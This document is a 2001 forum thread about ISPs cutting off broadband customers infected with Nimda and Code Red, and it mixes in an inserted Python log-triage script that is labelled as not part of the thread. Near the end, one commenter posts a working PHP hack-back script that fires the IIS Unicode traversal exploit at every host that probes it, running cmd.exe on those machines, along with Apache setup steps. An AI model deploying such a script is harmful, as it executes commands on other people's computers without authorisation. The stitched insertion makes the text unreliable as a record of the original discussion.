Shutting Down Worm-Infected Broadband Users
disc-chord writes "Frustrated by Code Red and now Nimda, the DSL provider DSL.net (a CLEC and reseller of Covad) has shut off 800+ infected customers. They claim they cannot get in touch with all of their customers, so they're just shutting them all down, and waiting for the customer to call them. When/if the customer does call they are informed that they are infected with the Nimda virus and must remove it before they will be reactivated. But how are customers supposed to fix the problem when their internet connection is shut down?" I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. The Internet is a peer-to-peer system where one peer can piss in the public pool. These ISPs are doing a good thing by keeping this crap off the net. Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users. At least this way they know what's up. Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. ISPs shouldn't have to be responsible for their users this way, but they are responsible for keeping their other users online, and a few infected boxes can cause a lot of havoc for the whole net.
Why is it an ISPs job to have any concern over what's passing across the wires? They are just packets and that should be that. If users wish to run systems which are configured to respond in a particular way to particular requests on port 80, that's the users' business.
I don't see this as caring or responsible behaviour by the ISP - I see it as unwelcome nannying. As the poster said, users should be responsible for their own systems.
-- Ed Avis ed@membled.com
Free Mac Mini
Microsoft will never fix the problem without making sure people have to pay a monthly subscription
I could have sworn both the Code Red and Nimda (multiple) exploits were patched in October *last year*.
Yes, it's the fault of the users not keeping their machines up-to-date, but please, don't blame this on MS when they released, and advertised, a patch promptly. Heck, it'd be like some idiot running an old version of Sendmail blaming the sendmail author(s) on his box getting hacked. If you're on the net, it's your responsibility to stay safe.
http://twitter.com/onion2k
Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users.
Confuse users? Bah! They get confused well enough on their own!
My major issue with blocking ports is that, well, no ISP should! An ISP provides internet connectivity, and that's what they should do.
Yes, I agree they should have some say so over what traffic comes and goes over their network (i.e. no spam, DoS attacks, etc), but I myself would not give any ISP my business if I knew they were making choices about which ports I can or can not use.
I think they are doing the right thing by booting infected users. It's certainly better than any form of port blocking.
"Everything you know is wrong. (And stupid.)"
Moderation Totals: Wrong=2, Stupid=3, Total=5.
"I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. "
I think the huge underlying problem is that a) people do *not* know their box is infected and b) if they do know, they have no idea what to do about it. Don't forget, most people are very timid and lack any basic knowledge regarding computers. All they know how to do is double click on the word2k icon, or outlook, or whatnot.
S.t.e.v.e.
Surely if a user is infected, the ISP could cut them off from the world but still allow them access to an internal ftp site which had patches to fix the problem?
what, like this one
but what use is a firewall against this?
If you are running IIS as your webserver you let port 80 through the firewall and into IIS and thus expose yourself.
There are places where the networks are not touching, and there are places where they are. -Boeing's Lori Gunter
I was just asking someone why ISPs don't do this. Why should the subnet I'm on get punished because of users who don't know what they're doing. Obviously they're going to call tech support and then get a quick lesson on how to download and install an MS patch.
I'd rather have the infected parties make some effort instead of the AT&T approach of just closing port 80 and letting the ignorant go unenlightened.
New slogan? Patches are the new killer app!
"many hi-speed companies ACTIVELY DISCOURAGE YOU from setting up your own firewall"
:)
Mine didn't. Mine provided pointers to Zone Alarm for windoze users and said that security was the user's own problem in the nice little handbook they gave me. Then again, mine's in the UK so doesn't have to pander to the Great Unwashed just yet..
(Of course, it doesn't help that the guy they sent round to install it saw `zsh, spodzone 18:03 #' and asked `is that windows 2k then?', but at least it left me free to do the obvious with dhcp instead
~Tim
--
Rushing on down to the circle of the turn
Turning off people's connection is rude. Asking a 75 year old senior citizen, who is just happy to read a few web pages and send mail to his grandkids to keep up an endless stream of patches because a bunch of hackers can disrupt the net is backwards.
Why? Internet access isn't a right, just like (despite what your average American might think) driving a car is not a right. If you want access to the internet (a peer to peer network) it's your problem to make sure you don't have a broken setup that will annoy people. In other words your part of the bargain is not to do anything that will break the network, it's your responsibility. Having a broken web server that gets infected by the latest worm is breaking the bargain.
Al.The Daily ACK - Eclectic posts by yet another hacker
It takes care of the thousands running IIS without meaning to, those people who didn't really notice the checked box while they were installing WinNT/2K. Increases the likelihood that someone who has a world-accessible webserver *knows* they have a world-accessible webserver, cause they had to expressly do something to make it happen.
"That's Tron. He fights for the Users."
Yeah, you really know the score about NIMDA, don't you.
You can get Nimda about seven different ways and 6 of them have nothing to do with running a web server. Just browsing an infected site, something beyond your control, with IE 5.5 sp1 or less was enough.
I'm still working on a clever footer.
That is, uhm, stupid. Why would you shut down port 80 for infected machines? To prevent them from being infected twice? Shutting down port 80 for vulnerable machines is more sensible, but how do you tell them from the well-patched servers? Blocking ports isn't meant to be a punishment, it's supposed to be a preventive measure.
Seriously, with the FBI et al up to their keisters running carnivore and echelon stuff, do we really want to let the ignorant clog up the net with malicious traffic? Just that much more traffic for them to sort through before they let our legit traffic pass. We can piss and moan about civil liberties all we want, but the powers that be are going to do everything in their power to get the terrs, and letting them send out diversionary traffic isn't going to help. I just hope what they're doing doesn't get so illegal that they blow their case out of the water.
Actually I'm surprised, this is the first thing I've seen on the web that has mentioned Sept 11 and viri etc. that has stayed up for more than a few seconds anyways.
Apocalypse Cancelled, Sorry, No Ticket Refunds
If you knew anything about Nimda you would realize that you can get infected from simply reading an e-mail using an older version of Outlook, or browsing a web page using an older (but not that old) version of IE.
I'm in favour of ISPs locking out infected machines that have demonstrated no attempt at fixing the problem. After all, these people have shown a blatant disregard of basic sysadmin responsibilities: how long has CodeRed been known about now?
However, here's a suggestion for a better response than simply removing Internet access to/from infected machines. The ISP runs some kind of DMZ server, but on the DSL side. All web traffic from infected machines is redirected to that one server (via transparent proxying), all other traffic is blocked. That way the end user can instantly see what's wrong. The ISP can also mirror the relevant patches on the DMZ so the end-user can get back up again as fast as possible.
It would take some setting up initially, but would reap substantial rewards in the long run.
| What, you were expecting
-O_O- +---- something witty?
I _have_ been doing something to help people who "just want a PC" and don't have the wherewithal to deal with constant security threats, patches, and attacks:
I'm setting them all up with Macs.
For all the (often justified) grief that Apple gets for their pricing, a low-end iMac is a nice home PC with a lot of functionality, a good software bundle, and MacOS 9.x is all but hack-proof.
It solves the home user problem nicely.
-- Josh Turiel
"2. Do not eat iPod Shuffle."
Sorry. Apache is more prevalent than IIS.
Remember Code Blue a week or so ago? The one that affected Apache/Unix users? The media called it the "Code Red" of the Unix world. What happened with it? Nothing. Most systems were secured against it by default.
Nimda affected more systems in 10 minutes than Code Blue did in the past week.
Learning HOW to think is more important than learning WHAT to think.
Those affected should welcome this kind of action. After all, the internet provider is closing a backdoor for the customer. That backdoor (FULL system access!) would otherwise keep announcing itself to the world.
Bollocks.
If you get cracked, it's through your own silly fault. If that's because you believed M$loth and/or got the impression that installing software was a zero-maintenance task, you deserve what you get.
And don't try to play the 75-yo sympathy game, either, the rules are just the same: you get your box cracked, you're responsible for it scanning & spreading to other sites, end of story.
Yes, most @homes specifically say you can't run servers in their AUPs, although DSL ISPs (and some @homes) typically let you run servers to your heart's content. However, one real advantage that blocking port 80 WOULD have is denying the ability to access the backdoors created by nimda / code red on those machines.
this worm is particularly nasty. it's really made my work week, that much is for sure.
...to NTBugTraq? Do they even service pack their server or workstation? The answer is: no, not everyone. The information required to be a good MS product admin is there, you just need to get it. If you're a legit microsoft product owner it ought to be required that you get a digest format of their advisories in e-mail weekly. (An even better question is: how many of these IIS servers are properly licensed ???)
...Both, in my estimation. While I agree that it is the responsibility of the user to keep themselves patched, ISPs monitor network traffic, they can easily pay attention when a known high risk virus or worm is flooding their network.
in response to the growing storm regarding users vs ISPs... (/me dons his asbestos shorts)
yes users are responsible for their systems, they are responsible for watching patch levels, they are responsible for watching out for vulnerabilities. So many people throw up an IIS server or what-have-you on their DSL/Cable line it's not funny. Do you think all of them are subscribed to microsoft's Security advisory list?
And for those of you that thought I was beating on the users hard up there...Yes it is the responsibility (nay, the duty) of the ISPs to protect their networks, and by mission of action the internet. I run apache as my webserver of choice; my logs were flooded with attempts to find CMD.EXE and ROOT.EXE in all the right MS places tuesday night and into wednesday morning. A veritable denial of service attack. Here's the kicker: I'm on a dynamic IP! (nice about the randomization of searching in this worm...) Many requests were coming from my own ISP's network. Do you think they responded when I e-mailed them? no, they didn't.
A good ISP shuts off a user who (knowingly or unknowingly) abuses their connection. What if this worm were more malicious? What if it caused data loss? Think of the liability that could impose, so'n'so's unpatched web server infected my unpatched webserver and blew away my e-commerce site. Who takes the blame? so'n'so? or so'n'so's ISP?
Don't even get me started on why worm/virus writers should be sending their exploits to anti-virus companies or other proper organizations instead of releasing them into the wild.
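The triage the comment above describes (an Apache log full of CMD.EXE/ROOT.EXE probes, many from the ISP's own address space), as an added example that is not part of the original thread: it tallies worm probes per source address from constructed sample log lines and flags the ones inside the ISP's own netblocks, which is the kind of disconnect list a later comment says is "quite easy to automate". The log lines, addresses and netblocks are constructed; the probe patterns (root.exe, cmd.exe, readme.eml for Nimda; default.ida for Code Red) are the well-known ones.

```python
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed Apache combined-format access log, of the kind the comment
# describes: IIS-specific worm probes hitting an Apache box. Addresses are
# RFC 5737 documentation ranges, not real hosts.
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2001:22:14:01 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
192.0.2.10 - - [18/Sep/2001:22:14:02 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
192.0.2.10 - - [18/Sep/2001:22:14:03 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
198.51.100.7 - - [18/Sep/2001:22:15:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 280 "-" "-"
203.0.113.5 - - [18/Sep/2001:22:16:12 -0400] "GET /index.html HTTP/1.0" 200 1043 "-" "Mozilla/4.0"
192.0.2.44 - - [18/Sep/2001:22:17:05 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331 "-" "-"
"""

# Request-path signatures of the two worms the thread discusses.
SIGNATURES = {
    "nimda": re.compile(r"(?i)(root\.exe|cmd\.exe|readme\.eml)"),
    "code_red": re.compile(r"(?i)/default\.ida\?"),
}

# Apache combined log format: client, ident, user, [timestamp] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return (client_ip, request_path, status) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m.group("ip"), m.group("path"), int(m.group("status"))


def classify(path):
    """Name the worm whose probe the requested path matches, or None for ordinary traffic."""
    for worm, pattern in SIGNATURES.items():
        if pattern.search(path):
            return worm
    return None


def tally_probes(log_text):
    """Count worm probes per source address: {ip: {worm_name: count}}."""
    counts = defaultdict(lambda: defaultdict(int))
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue  # skip unparseable lines rather than crash on a noisy log
        ip, path, _status = parsed
        worm = classify(path)
        if worm:
            counts[ip][worm] += 1
    return {ip: dict(worms) for ip, worms in counts.items()}


def quarantine_candidates(log_text, own_netblocks, min_probes=1):
    """List probing hosts, marking which fall inside the ISP's own netblocks (the ones
    the ISP can actually disconnect or call); own customers sort first, busiest first."""
    nets = [ip_network(n) for n in own_netblocks]
    rows = []
    for ip, worms in tally_probes(log_text).items():
        total = sum(worms.values())
        if total < min_probes:
            continue
        addr = ip_address(ip)
        rows.append({
            "ip": ip,
            "worms": worms,
            "probes": total,
            "own_customer": any(addr in net for net in nets),
        })
    rows.sort(key=lambda r: (-int(r["own_customer"]), -r["probes"], r["ip"]))
    return rows


if __name__ == "__main__":
    # "192.0.2.0/24" stands in for the ISP's own customer netblock (constructed).
    for row in quarantine_candidates(SAMPLE_LOG, ["192.0.2.0/24"]):
        who = "own customer" if row["own_customer"] else "remote"
        print(f"{row['ip']:<14} {who:<13} probes={row['probes']} {row['worms']}")
```

Reading the real log would replace SAMPLE_LOG with the file contents; the parser ignores lines it cannot match, so a mixed log does not abort the tally.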
My ISP (Road Runner) suggested it verbally and pointed out in the TOS they also recommend one for users.
I've had almost 25,000 incoming port 80 requests since this virus was unleashed. (That's with my Linux box running constantly.) It's nice to see an ISP doing something productive.
To the naysayers, I'd like to point out that they aren't punishing people; just making them call to get their access back and make sure they're not infected. Remember, the bandwidth belongs to the ISP. They have to protect it.
I wish BellSouth would do something similar, but they've always been clueless. Heck, many of these requests were from BellSouth servers!
Road Runner in Central Florida has done the same thing. Don't know if it includes the rest of the country.
:-)
At first I didn't know if they'd blocked just me, to stop the constant flood of email from my auto-notifier.
There's a lot of damn stupid people in the world...heck, I've met several people who run NT or 2K Server at home...I ask them why...they say "it's more powerful!" I'm reminded of those moments in Baseketball when the evil rich guy, when confronted with an example of supreme stupidity, holds his hands to his head as if in great pain.
Heck, I've even met people who are convinced that, to do simple SMB filesharing, you *have* to have Server, workstation "can't do it". Total BS, but when has that ever stopped anyone believing something.
Getting it from a site won't make your system start broadcasting out for other sites. That ONLY happens when an IIS box gets infected.
So no one would care if your non-IIS workstation was infected...the only person with the problem would be you.
Oh, that's just pathetic.... You would only use the "but what about the elderly and the children" argument to drum up emotion when you have no other logical argument. To respond in kind, what about the other 75 year old senior citizens who have a clean computer and can't read web pages or send mail to their grandkids because the network is so flooded that they can't get anything through. Do you think they'll understand why this "dang new-fangled contraption ain't workin'?"
I'm not a cold-hearted person, but you've got to look at the facts. Shutting down these connections is pretty much the only way to make sure people will clean up their machines. You can't forget that the Code Red II virus, and presumably nimda as well, opens up a nice little hole that can be used to turn your machine into a Zombie. If the zombies get used, an ISP will have machines on their network attacking corporate and government computer systems. That's an absolutely *massive* liability there, especially since it can be proved that the ISP was aware of the infected machines and did pretty much nothing to eliminate the problem.
The best idea I've seen yet is the one to set up a "private" network for the infecting machines and direct them there. For those ISP's that don't want that expense, maybe offering to send them a CD with the patches and instructions in the mail for a reasonable fee would be a better alternative.
GreyPoopon
--
Why is it I can write insightful comments but can't come up with a clever signature?
AT&T Broadband's modem leasing agreement clearly states that you can run a http or ftp server.
Yes it sucks, yes it's unfair and yes you'll probably have to pay five times your normal price to have it enabled, but it'll deter those people who have no need to run a web server (i.e. those who don't realise they're even running a web server) and will make the DSL provider's life a little easier.
You'll see.
Avantslash - View Slashdot cleanly on your mobile phone.
but they are running IIS, which isn't a free web server; they should have paid plenty of $ to run it
Actually, IIS is entirely free. Or at least it comes built into Windows 2000 and 98, and is downloadable for free for NT and 95.
Our campus was affected rather badly by Nimda, and as a result the students were cut off from the network to make sure that they weren't infecting or being infected by the worm. The outage only lasted as long as it took McAfee to distribute the cleaning agent for it.
If you have cancer, you cut it out, right?
It's not unwelcome nannying, it's a necessary precaution. You do what you have to do to ensure that you maintain your level of service.
I haven't done it myself, but I seem to remember reading somewhere that a particular version of Samba was the first to introduce domain controller functionality.
Actually, here's some info on that: http://bioserve.latrobe.edu.au/samba/ntdomfaq.htm
I should try this out sometime...it would make the Windows boxes on the home network play a little nicer, I think...don't particularly want to waste a box with NT or 2K Server, but I've already got a handful of boxes running Samba...might as well use them to their full potential.
In this time of knee-jerk reactions to terrifying disasters, this warning seems richly appropriate.
I pay for DSL, I can run *WHATEVER* I want on it. Saying "tough beans" is a little short sighted.
If, on the other hand, they would like to have me charged (as in contact the RCMP or %your_local_federal_police%) for cracking I would 'understand'... the rule of law is always the highest order; to simply make endless arrays of rules in contracts - and force people to abide by them (lest they go without (be martyrs)) then why have Law? Why have Legislature? Corporate Contracts for all manner of 'things' are creeping into every crack of life. These "contracts" force people to give up their rights in order to exist in a corporate controlled world... think I'm nuts? go read some of the EULA discussed on /. this week... NO CONTRACT SHOULD EVER LIMIT FUNDAMENTAL HUMAN RIGHTS.
This isn't exactly a 'cut and dry' issue, these contracts basically allow arbitrary 'for the greater good' decisions to be made by the DSL providers... I know that their TOS probably say "no bandwidth hogging servers" but, when ALL DSL is provided under the same TOS it becomes a method for DSL providers to make decisions about what I may - and may not - run on my box. I pay for bandwidth, allowing them to decide what data I may send and receive oversteps the bounds on my 'RIPE FOR ABUSE' meter.
Think of the Censorship analogy - if they can censor some speech, then they are only an 'arbitrary decision' away from censoring *YOUR* speech. What's to stop them from saying "you cannot download streaming OGG because there is no publisher-protection-scheme built in, and you may be violating copyright..."
Again, I may sound a bit unreasonable, or maybe paranoid, OBVIOUSLY I am not saying we want to allow these worms to run, but we must be wary of 'seemingly' reasonable decisions when made by 'powerful' (plutocratic) people.
They want to run this stupid MS Windoze OS, likely it's pirated anyhow (ever met someone who BOUGHT windows? I haven't), and then they're also too cheap to keep up with paying for Virus software to keep their ShitBox running. If everybody was forced to PAY for windoze, and then they had to go out and BUY additional software so windoze will continue to run, they'd all format and install Linux. I think the new XP is GREAT!!! the anti-piracy feature will surely get many to leave the darkside and join us in our quest for world domination. Shut them down and report them to the link below for Piracy from MS.
"The Most Fun Possible on 4 wheels" is at SunBuggy in Las Vegas
There are three feasible alternatives which high-speed ISPs could take that I can see:
- Leave it alone, and maybe warn clients that they are infected. However, clients will probably get infected faster than they can fix their systems, especially those who don't even know what a web server is.
- Block incoming traffic on port 80 to all clients. Affects all of your clients, even those that are and will not be infected, and most likely gets you a bunch of angry users (which are those who know what they're doing anyway, the ones that ISPs like least).
- Temporarily disable access to the infected clients. You can be SURE you will hear from them VERY soon after their cable modem stops working. This also affects only clients that ARE infected, and is quite easy to automate. If the virus causes so many problems, then I think it's only fair that clients who have compromised systems be disconnected until they fix them.
I was a Videotron cable client until they started "handling" Code Red. Their solution was to suddenly block all incoming traffic to port 80 at their router, which, needless to say, is tough luck for my personal web server. I moved it to another port, but it took me a while to realize it was being blocked, since they did not inform anyone of their new restrictions. That measure has been "temporary" for nearly two months now, and the number of code red infected clients has not dropped. More recently they started blocking incoming traffic on port 25 to all of their cable clients, to "prevent clients from sending spam". That was the last straw, and I switched providers.
"I remember Y1K, every abacus had to get another bead"
When a Win98 or NT Workstation (not running IIS) gets infected via an exploited web site, does that workstation start broadcasting out? Or do the workstations just pass the .eml files over the network hoping to infect another IIS system?
"FTP/HTTP Service Setup. Customer should be aware that when using the Service to access the Internet or any other online network or service, there are certain applications, such as FTP (File Transfer Protocol) server or HTTP (Hyper Text Transfer Protocol) server, which may be used to allow other Service users and Internet users to gain access to Customer's computer. If Customer chooses to run such applications, Customer should take the appropriate security measures. Neither AT&T nor @Home Network shall have any liability whatsoever for any claims, losses, actions, damages, suits or proceedings resulting from, arising out of or otherwise relating to the use of such applications by Customer, including without limitation, damages resulting from others accessing Customer's computer."
-- ;-)
Kuro5hin.org: where the good times never end.
i work for a major webhosting company and when the first code-red wave hit our customer's unmanaged servers, we simply assisted them in locating information about patches, provided them with instructions, etc.
however, most of our customers basically ignored our repeated warnings to patch their servers properly and when nimda/blue worm hit our network in the past few days, we simply started shutting down servers. we had given them 2+ months and the patches required to fix these issues had been released by M$ for almost a year. if shutting our customers down is the only way we can raise awareness about these issues, then so be it. we have tried to help them and they just ignore us.
i give up.
Using a computer is a lot like driving a car, from the point of view of responsibility taken. A normal PC is like some family wagon: relatively cheap, quick and quite safe. Running a web-server is a lot like driving an 18-wheeler.
A person who runs a web server has to defend himself from all the security risks that he might face, exactly in the same way as a truck driver has to maintain his brake system. Of course, one can get along driving a truck without tuning it at all, but then what can protect him from wet slopes in stormy weather?
Lots of people install a web server either because they don't bother to look at what they install, or because they think it cool. But web servers are not children's toys; if people aren't aware of the harm they're causing, they must be stopped.
I live in Israel. In the last few days I've been getting quite a lot of internal ISP traffic bound to my port 80 (luckily I run Apache and a firewall). Many of the people from whose IPs (dial-up!) I've been getting connections haven't even bothered to shut down their FTP servers (which were of course MS-FTP). Those morons deserve to be thrown out.
Well DUH! Helping people is really nice, but if you'd read the article, the point is that the ISP's haven't been able to get in touch with people! The intent here is NOT to slap people around for being stupid, but to get their attention!! This sh-t has been going on for months now. I say it's about time the ISP's get proactive and start forcing people to wake up and clean up their systems!!!
Your Servant, B. Baggins
Great email. I'm glad providers are finally taking a stand. If these machines have still not been patched after 2 months of publicity, they never will. The only way you are going to get it done is to kick these people off the net until they do it. It takes some balls to do this, as these idiots are also the type who will call and throw a huge fit claiming that their machines are perfectly fine. I wouldn't want to be in customer service, but I'm glad they're doing it for the betterment of the net.
"The guide is definitive, reality is frequently inaccurate."
I don't see this as caring or responsible behaviour by the ISP - I see it as unwelcome nannying.
I hope this is a troll, but I fear it is not.
If I leave the fence to my pool open, and my neighbor's kid walks in, falls into the pool, and drowns himself, I am liable not only for civil but also for criminal damages. If my dog gets loose and injures someone, I am also liable. Why, then, if my computer damages others' machines on the internet, should I not be liable for damages?
What I think needs to happen is this: Any owner of an infected netblock needs to be assessed a charge if their computers damage or disrupt traffic on the Internet. The fines should be commensurate with the amount of damage caused. If I'm a major ISP and I own a large netblock that's affected (even if I sell parts of that netblock off), it should be my responsibility to track down the sources of that disturbance within my network and eradicate it, otherwise I should be punished.
I no longer have any tolerance whatsoever for lazy or complacent admins; fines may finally force people to wake the fuck up and secure their goddamned machines and their networks. I mean, come on! Nimda exploits holes in Windows NT and 2000 that are over six months old, and it's done a pretty damned good job of showing me that there are plenty of clueless admins out there! These admins need to be dealt with, they're making life hard for the rest of us.
You call it nannying. I call it being responsible.
"Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS
Taco,
I generally look forward to your little comments appended to user submissions. However this is out of line. MS, regardless of how many people hate them, has released a patch for this. It's the users who have the problem. Not that MS is blameless, but calm down before you flame.
I know I'm going to get flamed for this, but Linux has its own security holes too, with plenty of script kiddies out there attempting to exploit them and root your system. The only difference is that the average sysadmin stays on top of things like this.
If 90% of users ran Linux, worms would be written to hit them, and the MS proponents over at seecolon.org would be laughing it up, whining about how Linus doesn't do enough QA, even though it's the users' fault.
As for shutting down broadband users who have the worm, this is pretty much the only thing you can do. You can't block outgoing traffic to port 80, or they would never be able to download any patches. They should turn them on for a temporary basis after they complain, say for 1 day, and give them the appropriate information to clean their system and install defenses. These guys are on broadband, so they can easily download any patch.
Anyway, that's enough ranting for me. Just remember, while MS is not blameless, think before you start flaming them.
Captain_Frisk
This is the same as win9x, macos, win2000 with users who run as administrator, and linux with users who run as root!
Those users choose to run as root. With XP, ActiveX controls on a web page will be able to run as root, without any knowledge of the user. Contents of emails will be able to run as root.
Thirdly, adding raw sockets is a very common add-on to windows and linux just to do these kinds of DoS attacks.
Yes, but you have to get enough access to add it on. With XP, you won't, anymore. It'll be a whole hell of a lot easier to do. As for Linux, the fact that you think it's an add-on speaks volumes as to whether you know what you're talking about.
It's up to the operating system to be able to *handle* badly formed data, not other OSes to protect it from it!
Name one operating system that can "handle" a massive distributed denial of service attack. I'm sure the entire industry is awaiting your answer with bated breath. What OS is on the other end means nothing when 10 pounds of shit is being rammed into a five-pound sack.
Steve's objection isn't to raw socket support. Raw socket support is available in every mature OS in existence that has TCP/IP support.
Steve's objection is to taking something that previously required privileged access, and thus required a major break in security to get on machines you don't own, and making it suddenly available to unprivileged processes BY DEFAULT, making every Windows XP machine suddenly a hell of a lot easier to use as a DDoS platform, without breaking the security first.
Steve's second objection, and the one I was using as a case in point, is the fact that Microsoft doesn't just not understand the problem, they made it abundantly clear that they don't CARE whether or not it's a problem, because Marketing wants the feature, and Security is at best a tertiary consideration.
Nimda uses several attack vectors and not all of them involve an IIS. A machine infected by Nimda isn't necessarily running Win2K Server.
Ok.. So the Microsoft huge sales figures come from where?
Most of these people ARE likely to be legit users of IIS.
Unless you're a tech in the company in question, you'll never have access to the install disks (those, usually being locked in fireproof cabs, or held in the technical offices for most places I've worked).
Therefore, if it was a tech 'borrowing and installing' IIS for home use (DSL), they'd be much more likely to keep it patched, and know how to when they receive the email. And a lot more likely to be checking.
This does reek of a home user who has no clue that it's installed, or how to remedy the problem.
Malk
"Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes."
1- Microsoft has already added a firewall into Windows XP, allowing users to block attackers.
2- Microsoft had patches for these exploits up months ago, for free. Internet Explorer semi-regularly forwards Windows users to an automatic website update that explains they need to patch their OS to install patches that fix problems, including security issues. It is not their fault that the users are directed right to an automated patch utility and CHOOSE TO IGNORE IT ANYWAY!
give credit where credit is due, please.
--
"It is now safe to switch off your computer."
The other day I received an e-mail from a relation of mine which was the SirCam virus in all its glory. Luckily for me I don't use Windows or Outlook for my e-mail. I told them that they had a virus and that they should try sorting it out. They told me they ran their anti-virus and nothing was detected, so they let me know I was wrong (got to love relations ;). It was only when someone else told them the same thing that they came back to me, telling me that despite getting the latest anti-virus update nothing could be detected.
Not being in the same country I decided to find some help documents and e-mailed them the references. It was only after they told me they were still stuck that I realised that most of the documents were oriented towards techies and not towards your average Joe, who considers programming the video a nightmare. In the end I told them to either find someone they knew who was good with computers locally or ask their computer shop if they could resolve the problem.
So here is the problem: what is your average Joe meant to do when all the help is targeted at people who aren't technophobic? Unless this can be addressed, infected computers are going to stay infected long after the fix is available.
Forgot to mention that my relations are using a 56K connection, in Europe where being connected costs money by the minute, so when your average OS patch is starting to exceed the 20Mb size, it is likely to make some people wonder whether the update is worth the effort.
Jumpstart the tartan drive.
So when are the authorities going to not only FIRE people for purchasing Msft products, but ARREST & PROSECUTE them for not patching and keeping them worm free and in general from pissing in the public pool? That's what I'd like to see since Msft wants to both 1) publish buggy and patch later 2) market their shiny baubles to the vast computer ignorant laity.
Similarly, there's a certain division of responsibility when someone buys a car - if there are defective parts that might threaten the safety of other drivers (such as tire blowouts), it's the mfg's responsibility to send out recall notices and fix it; but it's also the owner's responsibility to operate the vehicle in a safe manner. What happens in the software licensing world is the mfg assumes *NO* responsibility, even for defects that might endanger data or other people's PC's via a network (info 'superhighway').
It gets really bizarre when you consider that software and all rights remain the property of the authors & publishers, but responsibility for its misdeeds & FU's falls on the poor suckers who fell for the slick ads, don't read or understand EULA's, pirate the stuff, etc. That's like GM leasing cars with defective brakes, and holding the operator responsible for all damages that occur when they fail after pulling onto an off ramp and crashing into a child care facility.
try { do() || do_not(); } catch (JediException err) { yoda(err); }
Heh, my ISP is in the UK too.. :) He took away an ISO of Red Hat, and one of FreeBSD for when he was feeling a tad more adventurous. :)
When the Engineer came round to set up my Cable install, he told me I needed a Windows installation (after I told him that this was Linux, not a prettified windows) to set up the cable modem. When it came down to me having to pull a full tower case into a small room from another room in the flat, he asked if there was any way to just get a browser on the Linux box. So up came Mozilla, and he was just blown away with how easy it was to run. I left him tooling round on X for a while, and maybe we got a convert out of that.
Malk
I made a PHP script by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe":

<?php
/* Open a connection to the offender (the host that just probed us) */
$fp = fsockopen($_SERVER['REMOTE_ADDR'], 80, $en, $es, 5);
/* Check to see if the connection actually opened */
if ($fp)
{
    /* URL-encode the message... */
    $string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");
    /* ...and send it */
    fputs($fp, "GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+$string HTTP/1.0\r\n\r\n");
    /* close the connection (though it probably got closed automatically) */
    fclose($fp);
}
/* for fun and confusion.. */
header("HTTP/1.0 404 Not Found");
echo("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
echo("<html><head>\n<title>404 Not Found</title>\n</head><body>\n");
echo("<h1>Not Found</h1>\n");
echo("The requested URL " . htmlspecialchars($_SERVER['SCRIPT_NAME']) . " was not found on this server.\n");
echo("<hr>\n<address>Apache/1.3.20 Server at " . $_SERVER['SERVER_NAME'] . " Port " . $_SERVER['SERVER_PORT'] . "</address>\n");
echo("</body></html>\n");
/* log the offender's address and the time of the probe */
$res = "dirty\r\n";
$log = fopen("/tmp/nimda.log", "a");
fwrite($log, $_SERVER['REMOTE_ADDR'] . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>

Then (after making sure users can access the file), try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right?

Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf, /usr/local/apache/httpd.conf, whatever it is) and put this type in like this:

AddType application/x-httpd-php .php .php3 .exe

Now restart Apache by issuing one of either:

/etc/rc.d/init.d/httpd restart
apachectl restart

That should do it, and you're going to have a logfile of all the people who have been warned in /tmp/nimda.log.
Consider the daffodil. And while you're doing that, I'll be over here, looking through your stuff.
Considering that the McAfee software is only going to remove known threats, it would be better to perform a data backup and reinstall the system software on an infected host-- who knows if McAfee missed something in the clean up? Better to get a clean copy running than a patched version of an infected copy, and then, before you put the clean system back on line, you take the necessary steps to prevent getting infected (like turning off IIS) while you obtain patches for the vulnerable services. Considering that these are residential accounts, there is no revenue to be lost from server downtime, right? And the host owner should take his/her time to do the job right.
I do not have a signature
This is true, of course. This worm spreads in a number of ways, all of which exploit security flaws in Microsoft software:
Notice a pattern there? Yes, that's right. If you don't run Microsoft, you can't get Nimda. Or Code Red, or Code Red II, or SirCam, or Melissa, or...
This isn't about being a Linux bigot. You can't get Nimda on MacOS. You can't get it on Solaris. You can't get it on OS/400, or AIX, or an Amiga, or on *BSD. This isn't a matter of Linux being good. Linux is just ordinary, like any other half-competent operating system.
This is a matter of Microsoft being incompetent. Hopelessly, culpably, irredeemably incompetent.
